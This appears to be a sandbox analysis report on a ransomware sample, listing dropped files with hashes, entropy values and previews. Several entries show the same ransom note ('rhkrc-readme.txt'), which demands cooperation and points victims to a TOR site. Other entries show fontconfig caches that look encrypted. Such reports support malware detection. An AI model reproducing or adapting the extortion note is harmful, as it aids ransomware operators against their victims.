                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.cache/evolution/mail/trash/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.cache/evolution/memos/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:true
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.cache/evolution/memos/trash/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:true
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.cache/evolution/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.cache/evolution/sources/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:true
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.cache/evolution/sources/trash/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:true
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.cache/evolution/tasks/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.cache/evolution/tasks/trash/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:true
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.cache/fontconfig/158c65c810c0d352a587f5be66058e87-le64.cache-6
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):352
                  Entropy (8bit):6.041847847029313
                  Encrypted:false
                  SSDEEP:6:gY0tHugrsF8YfTSOlnx+FkDy1zmhOO/EUyp6Xcmmotgl7JRk/:ktOgrRoThlw/2DcUBvmot67U/
                  MD5:99323B17EF77FF25D8095AE2655DF7C2
                  SHA1:AA2EA246699117C6E3D54D6A5D2D7AC0BFE30DEB
                  SHA-256:BE0872F675037201777562BF229CD816FA592F1000D5CF9FB51C84253C65F214
                  SHA-512:1D788D1847A2CA9DBE40420D98E6C7BB48580C528E502C24108CBF2318B854A4F3AE4616E6C28623E0FB1923E5015B3B75A8C213A8662D7D06FF37AAD022BF2D
                  Malicious:false
                  Reputation:low
                  Preview: ....;.........q.BFm....?.Q...c..D.}DA..@.Z...3,_....:I...=T(i.^..A..=T.=......1.om".........];yG?..:..P.7....%.Pq.slD.K.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................w.G.L]............wG...h.y..8.|.....6.1@;............X^q
                  /home/user/.cache/fontconfig/4b14b093aebc79c320de5e86ae1d3314-le64.cache-6
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):6552
                  Entropy (8bit):7.950701869539734
                  Encrypted:false
                  SSDEEP:192:VRtl/UH740uwJzTe60eJc9GnLPTiMXe7Qri4ap2j:V7l/UHRPDwoiBYi4Nj
                  MD5:B0706AAE7A423AB64B301829F6FA9B81
                  SHA1:FD28A011506A804E3520B5B7233A46680F6E7972
                  SHA-256:E331025F54F134E0B936ADB8C02C9F486B99BA93985C8AA4FF46165712EFC554
                  SHA-512:5191254D6934E6CA7A2D1FCD5C81EA33EAEE61D5F5A2705420FD8A5BB7505C28A56AABF0B80E4C0463A4079A16E101087E2A3C6F8234F29FC5042A4383561C3C
                  Malicious:false
                  Reputation:low
                  Preview: ..DX.T.......y.Q.z.XF-x.|..2..P..:44.. (...T+...Hx.;7.C.Z.....;)..6[.(.......$.P..h#z_@..r..Y5-.4..}..M5...)'...A..U.n.y9=g>.V.._...E....%..1S....9!...fE...f.#>..T..>.M..cvW.{....7ZG-.O.T....H....ob.........4R:.5.^.A0E.Z3....."..J..L4*_P.A.9..........s....5..N..P..`..c..{........v....N.....E..C....k.O\j.j...5.0T.......=..|.|.^.....#.......)X..8j...v...T.....]..&0..+.. ........S.|.5..E.A.P.....X..If..H.1.B\u;.=..t`..p...M\...H.XR..By....I.F'...=>......~.u.dL......d~.$...P.....S..$.-A...........[....O.....%...X..../.sa...A..-_r.........U.3.......bE....h.7C\;~..['.O.c.....A._k(.K.5Q..K..%.......*.?%.9W_s.]l.Q].u...c...:tf.A...}.Y..m..'#...z...1j.fl...m..K..`.{"..."@....ut..%.KU....#.)..O...._'g<..2.|.....d.mm...W...TQ..Va..5.g8.8S.........otb|I.....sSj4..[1.......P..4.;..}/...GNv.....E.7.....Z..J/...L.....?T\.3.!.L6.m...}[.......*....Z.........N..s+.o...8.r.+....]..(j. ...b..:Q.o..U..&.Q...u\..j...0...:..;.^...[...t<=w...*....^.<...n....w.r..s.__.1H.5.b......:..L.m....A%....L....}<....C.Q
                  /home/user/.cache/fontconfig/7ef2298fde41cc6eeb7af42e48b7d293-le64.cache-6
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):13712
                  Entropy (8bit):7.98159903916993
                  Encrypted:false
                  SSDEEP:384:Vb7Tf9JUqTNwy/9ueSB1AbK5ru0ccmn+mPkKyBAa:pdwW9ueSBEQK0s+mPHyOa
                  MD5:E269A3F6D23A8C2DED60E231ADE6CE8F
                  SHA1:E88BC4C2338EC2C22B7B5FBD21AC84C376913524
                  SHA-256:3455A5F1F1A2D8BC637296852E798EAC4A75F3474BD62A99DFBF3C27B378BEB7
                  SHA-512:3A7D68DCE0E4F0F4A14EED42CF5D9F98E675C7EE0D703AC70AFACACDC21DB09268AE3E0C015DA78A27E28E129A169D193AE43F80D1620D5E3B2CAF63A7EC11EE
                  Malicious:false
                  Reputation:low
                  Preview: 9....U.....8/.8.;.P..h.0QN.l..v.B.XVw.....i....\'..y...qt/l.i=...........`.'DD..I?.%.<.O[.K...M............P.L....2]....."....U.rL.<...;9r...}<.....7;.>.w.F(+..*.R....p.O7..,..........&.....`.m.F.`.Y...G/.P.{CH.".?...S.~...~,.Z.l.|..Q.....9.T...H".....ph .l.(..3a.Y..y.qSFD....8........_y....o.....L..I....?..A..-.....V..!..SpZ.FHPT.;}...._.q...8..3F....SP7>.o.........}....J..Z..R..j.s..C....y.l...S..n.%.Q....[K..a.@.p..~+._..m...~...f6.ub.J.E.....#..........J....n..QHU....Yr...L...x.z..4........&....a.C.....N?'...6........ m.._S...y.>.nc...........;..P...J..#l..V..e3....}..]!6....r.]Z.G..oy?U..I+}Br...0.>....w.....<vx*B.J.T..W...7P2...O5WU..f....D..T..f...........`ssVH..'.Qs..'.../.R&...&..V..H|9.._..B..]...B....../.a..v9..P.......$......&N.Y......"p.....%.......<2..wO@.%.U. .s......*.;.../..NY.L............-:.......#.\..d.JE.e.S...wI.{R:s..l..m...=.Z...K.r......y...Y....G..1.....Lh... J......?..?D.,Q.-F.e.-.....B.....{..1.4UfOg....%u.@M.9.....k.m1H.;....+..........=.H.}.(...?..0J..w..M
                  /home/user/.cache/fontconfig/CACHEDIR.TAG
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):432
                  Entropy (8bit):6.4053970387210235
                  Encrypted:false
                  SSDEEP:6:I+dkrGr9Kuh1O4NVf9UO18etSE1DwtS11zmhOO/EUyp6XcIWabYjVkrE:ZNUuCW1f13zwtSL2DcUB//bYjSQ
                  MD5:0EA6DBE4A226A7F8B365269BDBF9B4D6
                  SHA1:F4B0641D7B88F812096C4EAD9464996C3A0B68B8
                  SHA-256:6E49F7812C20973D8A1F5F6616C789FD7FC45D2DE18D919E998D6CD7CEA86B61
                  SHA-512:2D3BABEFB3B31084FA9DD9EC9FFCFA00118F96930A8FAF48BDD503E8B495BF9F97C8F72A8419A2A783C39A972C84B2D48921F5533C519317F7DED09A7C1D7536
                  Malicious:false
                  Reputation:low
                  Preview: Vv..dm..?.+K.b....0.%[.%.......".Xs..S.T...Y.....?z.....,.W.v.B.....T....h..X...V.I.....XM.Y...l5.a...6..g.1.0;....S.bk..k...3..7Bs.+.>....G`..c..`w(....(....:.D....DOn.&.R#kV.fC.t./.?......o.Osa.....%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................*.S.{Lz...K.:.|..6&fv.z.f...0.6.."..p.6..'1..........q(
                  /home/user/.cache/fontconfig/a41116dafaf8b233ac2c61cb73f2ea5f-le64.cache-6
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):1856
                  Entropy (8bit):7.7759582805010234
                  Encrypted:false
                  SSDEEP:48:N4ezwlPBSyyPls1++lauIGeQJrUXqYPl+VMavJsDfH3n:mezwlkKHLo9kMssDfX
                  MD5:5C764996D13E314A090BB135EECB8882
                  SHA1:8F387B86E1BA6B0F7D8EE940D3D73FC5C86E02D9
                  SHA-256:1B90A3B9CF9B479A48B33D3718675D39B13C9AF2AEAC32E6E4CFD239E36D76AB
                  SHA-512:6DCA7FDFEF2B876AAD0116188AB021854BFCCC02AC917C0D1B7DE34037FCA250EFA0EAC68548E4BFAC1EA2D9583BE002717148888694715BEBF050E36C3787EB
                  Malicious:false
                  Reputation:low
                  Preview: M.........f.g...=.t..Z.C.x...{...B ..a....g*++.....'...}.....1-....a@.U..q1..C.r........D. ..fUl.....WD..K\............J#e..e~.C.S........*^|..(...r.Y.A@..\Z.....w..r..#o2...D/P:|<.W$.....s|z...........J......l..s.L.A.o.......CMo._.....3.N..R..........].G`T.o..z.=..>A..B.._..AC.FQQ..I..........._..}WKVp.......7...y...;W.E.v.nP.@.o..k["..M.j...}kgoK..F.....<.......T.,.k=d%>{h....9.D....F.Si..p.3.{.l..k..<).7Bw ....~..;y..(......p....e0....o\ ..O@.s,y2.x.......X.x......[[.rG.-0.3U....#\S...5.EvLi..q}.H..#........o....4G...A..Q......1C.V.~..J.f.....[.YP..g.....~XsT.8H9...m...;{.$..I|.p.%....]..'g].>.K`.Y...fwj.G&...o..F<@.{9.4....i.J...<.0 ~.....9....).g..."...........F..b..EP..BIJo...W..@.1..<v..'q....!......3m..2............=...0.t....9.+N.S.Z^4..b.B.5m...*G.ck')......6u.....}9...c.d..V..x....r.@..6.NL.W.p.....g~;s.....0.......l.*...v..H.Id;...`.=.p.....].S.4...d1hN.....Qi.....4hc......o}.p..+.N&.0..@B...!,.-.U....f..h_....W...........Yi..C..S....U'-|d.A1.w.l..7Qo..=.e...u..o*..j..N..R.
                  /home/user/.cache/fontconfig/bf3b770c553c462765856025a94f1ce6-le64.cache-6
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):29168
                  Entropy (8bit):7.9923018194592785
                  Encrypted:true
                  SSDEEP:768:tpTL2hsW5LtVaNevl2jr8bc27Kx8gIbAX6Bd557Idhvtl:tNLN4pVaYd489wMbAXgv9IdpX
                  MD5:D5EAA6FFD8A9A0CADCEEEF0BE5A66A9F
                  SHA1:8E271CBE9E95959D06E2D03357A943B8E6A2ABE8
                  SHA-256:E7CF91E6087079260729716B078C10CF237964FF77348490FF42D6C8DE87CCD3
                  SHA-512:30139BB4AFBCEAACC38BF61DAD1C3C9379FE528A30E4915ED8F9AA6652B808C1E4C7B640ED59A998E5963C79918D97C506CD6D59273DC795F0437CF7DFAB1A9E
                  Malicious:false
                  Reputation:low
                  Preview: ....s.[..1x....d.G.wJi.mo..._...p........R..:....sl.E....b.........#.)..P.....5...........+...t.T.......P.WA.Y........R...p.y..C...(......7..S.....)...^...1....`..~....S...,.4....D..\.....FisQ..q[..Wd....m...dJE.M.t]..E.....w.......a...(....C4o.R.E.....h.'..........#\.....5..j.....l.p.M...;!.V...f.......,..oE~a..[.8DT1.;v..r#.V.|q .l..B2u..L............1.x.......X...#`......Q.+..5..M.......[.>TK......[UW^...HV.N..'`.,TD.J..8b-.R....1r......O...,.m....i......t:.......r..UY.U..l\LUk).j.3P.............U1..(J{..b..F.......?.....m-`|...e.m...............N:.-..G(1...\)..G..N...'.'.2.[o.M. '.......RW~[.>;E.....5S~.W....t......5.RU.......bW@..sq.4.6.hV=.$f.....=[9...b.(.R...y.7.`....o.z{..|.t...r.].{........H..(......m...._....@}..5y`.......X...t..*.A.f2..b....a....YW.........6..Mg.'.N........5...1].u.......gK......O...V6..-....H.i2..~g.R..`y{...UR........X..L.J..E..e?......+.}.....x...Tn......<Q....|....>.U.G....D.z..+.|P...?..-]8.B........q[..y.K....q.....YO..K..D....m....!...z.....t..W....Y
                  /home/user/.cache/fontconfig/cabbd14511b9e8a55e92af97fb3a0461-le64.cache-6
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):97816
                  Entropy (8bit):7.998357173361317
                  Encrypted:true
                  SSDEEP:1536:6ofaEKUMFQSKCC3h+LBVPWgCdbrYhEuXD8JsD7tpmVuMWJ+/j2Ld8xFVxcRxiI/2:6SUUMFNKCC3h+j4FYfXoIJpWuvU2BG5l
                  MD5:068042DD925C7C2414600E853F283D5E
                  SHA1:59D7DB873155E396D35BB1F98454BE70C509CA83
                  SHA-256:CD0E27633F97FC629C258191D1621F1D05BCF26E0D40F7B982DA7EB1DFB3CB03
                  SHA-512:5032AB96265CDF7D142AD6276B0DE4C1B849617402D56AFDDEC8C6ADECF30833FFA1AF2818663C7BC547AD8E873E92B605DDB2AAD8390B93D6628BCA9F78BCAB
                  Malicious:false
                  Reputation:low
                  Preview: ...;.<{.>..t....N....!....X..i...h?.0@.#..@.@..=..t5.........J.....M>7,?....BC.G.......NG...p.%q.HED.s=.{.% .:..O.s.uOFC..`[&.#...gEK#7..@P.C....G#.....}8|.I.ZY..l..~\.R..m.P.Q.^2,.m.....3.4.....e....`Y.:........j..e=....ef...p.z.9.......f%gMg...E.Y.,G.f....-O._\....x...}...d...bA..P..._ty.X.6.B0 ..."....{N.6."v.R.]....&.....o.+....:.a.;.......y'...U.1.kBS.F:@.'d..I`x...X../...GQ0.....u..^.._...S.b.....Xy.V.l;.(.D&.......^..1..P0...{..l.eQ....V....../~U.n|,+.v...f...J.^.......i.e.<..St...r..r.K.8|ha.x.=..eB7~q......F+1W0N.m..DM.(5zop.f.....!8"..&0E7.l-.Y.5..i.1.....u.i....,.b'..h..h..L.L...T..U...1..v...3....2.(..LP...$i...C...M...CR....(..y..1...3.9S.y._/.3".....q.}s....r3...{.(...R.nI:.n+kv.....01..H........K$.}... .//..D3....5..n=.3...4#5.q....1J...6......S;.7g..5..r.c.....v......&.......l.-8..c.ESB..!...MB..M...#...!...;....*.....Z..]..(1o:"....,.C...k....&Q.c%....0F......4js,.>.dFFd0/.....yb7..36...v... ./T.9...t+.....<...%.6-...$...../A.s.aR..4..Et....}/d'.8.i#.E2..P..aX.....;.z9
                  /home/user/.cache/fontconfig/d589a48862398ed80a3d6066f4f56f4c-le64.cache-6
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):43928
                  Entropy (8bit):7.994952709892945
                  Encrypted:true
                  SSDEEP:768:eBIm6+P/BRRb1U1F/+e3jdjpcRAx/rL21AmCXY3dd+g9A2N2wk/4WCXYDk/Bzpo9:eBmy5RRb2T/joRAxe1AEd+gm2O/HSYDF
                  MD5:1DFCF18342E6AC9A14F7094CA8E09169
                  SHA1:91F06F7C2C70E12F8B51D2A43D7AF0BE797D6728
                  SHA-256:AE25535B5FD829EEF062AB056998F71804EF914636BBD430F9F04100D39AD90C
                  SHA-512:A57B114A76736C7DF471A8C848A4934C81DBFCF7027EE5F49E8EE1C1243FBDDE0C671F9753F2B350CF814767A2F61A6B8A978B4C020E1BB948776760D162C7F2
                  Malicious:false
                  Reputation:low
                  Preview: ]G....~p....1....`[.&..'?.0..yb.F.u.....fxj.&|K...z.!..i..h.[.FQ..9..... v'..z<.1.r[._+r.y...v...o..M4C..MM7.....{..-<.4|H.u......k...1p....J.%...d...[.[.`.k...*...#5Pk..`......f(S.q,(qz.=...%Zs<J.......N.8S3..FX.%...;ja..fS(...\.N...xa..[..`..{..8...C..kI....O......D.._.......5>....PM_...S.b....Y.'b._&..kSO.......3wbz%....{,p.U....v.C.f.S.~..c......,....`..[.q....3....m.a..N\(.|......Y.{.OC...x..Y.u........<..T....~.tsB2.G/........L.P{Hs.1.....L.[..t;......a!.S&l.....|/......Y_T!.A.#.Y.t...XV..@d.....sD.p..4....}.........af.i...y^....P.r..uF..x.G........[.4..Cr..#.;6.|....(.Og.g=*l.M8.v!.>v.QL.........-b..E.Y..8.S9.C@3......F.4.....O'Z.....R.}.....I.....:.x..6....3W..Fl...m.....J...S=.I.......Bdh..5....z.......5|}-b....4 R..m..0......8....].^.......{..w..F...P..... E.....7.......v.J..d~.=..e..PP..^ ,Y........CG....U.#%.X.(.G....vF.n...J..h..d..~.......d.O....O.g.xL..d9.H....8T...8.<.k...g...Q.aR.m.[vA.SF..&....ng?S......j}D.....*..gU.*,.e^.uw...*R...6J....dr..7.X*3.."l...`.J....X.Q_d.
                  /home/user/.cache/fontconfig/e13b20fdb08344e0e664864cc2ede53d-le64.cache-6
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):9408
                  Entropy (8bit):7.971890018965115
                  Encrypted:false
                  SSDEEP:192:3xjzI8ZK25TtZrfcsPYYl+8aav9OJrz0k+Pvl07x6gI5:3xPI8kutBksAK+GKX0k80d65
                  MD5:1504C5229126F59B24054FC75B8EBFD7
                  SHA1:2E1FF06E3F1B0C0B5B33565317DF0AC669632E36
                  SHA-256:971C9833308B63E7DB7D0FEB45A119B761FA5EC58B06594321A342CC5E9B0091
                  SHA-512:D84AF529E14A1F4E1ACE2163A0F1F1F213876A5D0BDC61A65BDE8CABF9E0067808C5642E99498DB6FF36566CA5DC7A817F5A83F654794BB3726ECFB905CF5CA3
                  Malicious:false
                  Reputation:low
